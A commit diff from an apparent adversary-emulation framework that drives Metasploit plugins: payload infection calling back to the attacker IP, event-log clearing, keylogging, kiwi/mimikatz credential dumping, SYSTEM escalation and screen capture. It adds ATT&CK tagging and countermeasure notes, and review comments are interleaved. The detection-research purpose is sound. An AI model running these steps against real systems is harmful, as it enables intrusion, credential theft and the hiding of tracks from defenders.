Fixed several issues in metasploit attacks

Thorsten Sick 3 years ago
parent 0cf8400eae
commit ac482e8b9e

@ -600,29 +600,41 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
result=res) result=res)
return res return res
def clearev(self, target): def clearev(self, target, **kwargs):
""" Clears windows event logs """ """ Clears windows event logs """
command = "clearev" command = "clearev"
ttp = "T1070.001" # It uses one out of three different ways to elevate privileges. ttp = "T1070.001" # It uses one out of three different ways to elevate privileges.
tactics = "Defense Evasion"
tactics_id = "TA0005"
description = """
Clear windows event logs to hide tracks
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="clearev",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
print(res) print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res return res
def screengrab(self, target): def screengrab(self, target, **kwargs):
""" Creates a screenshot """ Creates a screenshot
Before using it, migrate to a process running while you want to monitor. Before using it, migrate to a process running while you want to monitor.
@ -631,14 +643,25 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
command = "screengrab" command = "screengrab"
ttp = "T1113" # It uses one out of three different ways to elevate privileges. ttp = "T1113" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Do screen grabbing to collect data on target
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="screengrab",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on(["use espia"], target) res = self.meterpreter_execute_on(["use espia"], target)
print(res) print(res)
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
@ -647,10 +670,11 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res return res
def keylogging(self, target, monitoring_time): def keylogging(self, target, monitoring_time, **kwargs):
""" Starts keylogging """ Starts keylogging
Before using it, migrate to a process running while you want to monitor. Before using it, migrate to a process running while you want to monitor.
@ -658,19 +682,29 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
"winlogon.exe" will monitor user logins. "explorer.exe" during the session. "winlogon.exe" will monitor user logins. "explorer.exe" during the session.
@param monitoring_time: Seconds the keylogger is running @param monitoring_time: Seconds the keylogger is running
@param monitoring_time: The time to monitor the keys. In seconds
""" """
command = "keyscan_start" command = "keyscan_start"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Log keys to get passwords and other credentials
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="keylogging",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
print(res) print(res)
time.sleep(monitoring_time) time.sleep(monitoring_time)
@ -680,54 +714,80 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res return res
def getuid(self, target): def getuid(self, target, **kwargs):
""" Returns the UID """ Returns the UID
""" """
command = "getuid" command = "getuid"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Get user id
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="getuid",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res[0] return res[0]
def sysinfo(self, target): def sysinfo(self, target, **kwargs):
""" Returns the sysinfo """ Returns the sysinfo
""" """
command = "sysinfo" command = "sysinfo"
ttp = "T1082" # It uses one out of three different ways to elevate privileges. ttp = "T1082" # It uses one out of three different ways to elevate privileges.
tactics = "Discovery"
tactics_id = "TA0007"
description = """
Get basic system information
"""
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp) ttp=ttp,
name="sysinfo",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target) res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(), target=target.get_ip(),
metasploit_command=command, metasploit_command=command,
ttp=ttp, ttp=ttp,
logid=logid,
result=res) result=res)
return res[0] return res[0]
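Review bot: getuid's new tactic metadata does not match the command: `tactics = "Collection"` / `tactics_id = "TA0009"` are added next to the pre-existing `ttp = "T1056.001"` (Input Capture: Keylogging), which looks copied from keylogging; querying the current user is discovery, so `ttp = "T1033"`, `tactics = "Discovery"`, `tactics_id = "TA0007"` would be consistent with how sysinfo is tagged in the same hunk. The copy-pasted comment `# It uses one out of three different ways to elevate privileges.` now sits on every ttp line in this file and should be dropped or replaced per method. Accepting `**kwargs` only to read two keys silently ignores misspelled options; keyword-only parameters `situation_description=None, countermeasure=None` would keep the existing call sites working and surface typos, and this applies to clearev, screengrab and keylogging in the hunks above as well.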

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitClearevPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,17 +33,12 @@ class MetasploitClearevPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password, self.metasploit.smart_infect(target,
attack_logger=self.attack_logger, payload=payload_type,
attacker=self.attacker_machine_plugin, outfile=payload_name,
username=self.metasploit_user) format="exe",
architecture="x64")
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.clearev(target) self.metasploit.clearev(target)
return res return res
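Review bot: `from app.metasploit import MetasploitInstant` is kept on the new side although the only visible use in this file, the local `MetasploitInstant(...)` construction, is removed in favour of `self.metasploit`; unless it is referenced outside the shown hunks the import is now dead and should go (the same applies to the getsystem, getuid, keylogging, kiwi, migrate, ps, screengrab and sysinfo plugin sections below). The new `requirements = [Requirement.METASPLOIT]` line lacks the explanatory comment its sibling `required_files` carries; a note such as `# Framework services this plugin depends on; self.metasploit is expected to be provided when METASPLOIT is listed` would document the coupling the change introduces, to be confirmed against AttackPlugin. The result of `self.metasploit.clearev(target)` is still discarded while `return res` returns a value assigned outside the hunk; capturing it with `res = self.metasploit.clearev(target)` would make the plugin report what the command actually returned. The enclosing run method starts outside the hunk.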

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
import socket import socket
@ -17,6 +17,8 @@ class MetasploitGetsystemPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -33,27 +35,22 @@ class MetasploitGetsystemPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target, self.metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
architecture="x64", architecture="x64",
platform="windows", platform="windows",
lhost=ip, lhost=ip,
format="exe", format="exe",
outfile=payload_name) outfile=payload_name)
# TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70 # TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70
metasploit.getsystem(target, self.metasploit.getsystem(target,
variant=self.conf['variant'], variant=self.conf['variant'],
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
) )
return res return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitGetuidPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,19 +33,15 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, self.metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
outfile=payload_name, outfile=payload_name,
format="exe", format="exe",
architecture="x64") architecture="x64")
metasploit.migrate(target, name="winlogon.exe") self.metasploit.migrate(target, name="winlogon.exe")
metasploit.keylogging(target, monitoring_time=20) self.metasploit.keylogging(target, monitoring_time=20)
return res return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
import socket import socket
@ -17,6 +17,8 @@ class MetasploitKiwiPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -33,25 +35,21 @@ class MetasploitKiwiPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target, self.metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
architecture="x64", architecture="x64",
platform="windows", platform="windows",
lhost=ip, lhost=ip,
format="exe", format="exe",
outfile=payload_name) outfile=payload_name)
metasploit.kiwi(target, self.metasploit.kiwi(target,
variant=self.conf['variant'], variant=self.conf['variant'],
situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.", situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
countermeasure="Memory access into critical processes should be monitored." countermeasure="Memory access into critical processes should be monitored."
) )
return res return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
import socket import socket
@ -17,6 +17,8 @@ class MetasploitMigratePlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -32,14 +34,9 @@ class MetasploitMigratePlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target, self.metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
architecture="x64", architecture="x64",
platform="windows", platform="windows",
@ -48,6 +45,6 @@ class MetasploitMigratePlugin(AttackPlugin):
outfile=payload_name outfile=payload_name
) )
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64") self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitPsPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,17 +33,12 @@ class MetasploitPsPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password, self.metasploit.smart_infect(target,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
payload=payload_type, payload=payload_type,
outfile=payload_name, outfile=payload_name,
format="exe", format="exe",
architecture="x64") architecture="x64")
metasploit.ps_process_discovery(target) self.metasploit.ps_process_discovery(target)
return res return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitScreengrabPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,19 +33,14 @@ class MetasploitScreengrabPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password, self.metasploit.smart_infect(target,
attack_logger=self.attack_logger, payload=payload_type,
attacker=self.attacker_machine_plugin, outfile=payload_name,
username=self.metasploit_user) format="exe",
architecture="x64")
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
metasploit.screengrab(target) self.metasploit.screengrab(target)
return res return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors # A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitSysinfoPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.plugin_path = __file__ self.plugin_path = __file__
@ -31,18 +33,13 @@ class MetasploitSysinfoPlugin(AttackPlugin):
payload_name = "babymetal.exe" payload_name = "babymetal.exe"
target = self.targets[0] target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password, self.metasploit.smart_infect(target,
attack_logger=self.attack_logger, payload=payload_type,
attacker=self.attacker_machine_plugin, outfile=payload_name,
username=self.metasploit_user) format="exe",
architecture="x64")
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
si = metasploit.sysinfo(target) si = self.metasploit.sysinfo(target)
print(f"Sysinfo: {si}") print(f"Sysinfo: {si}")
return res return res
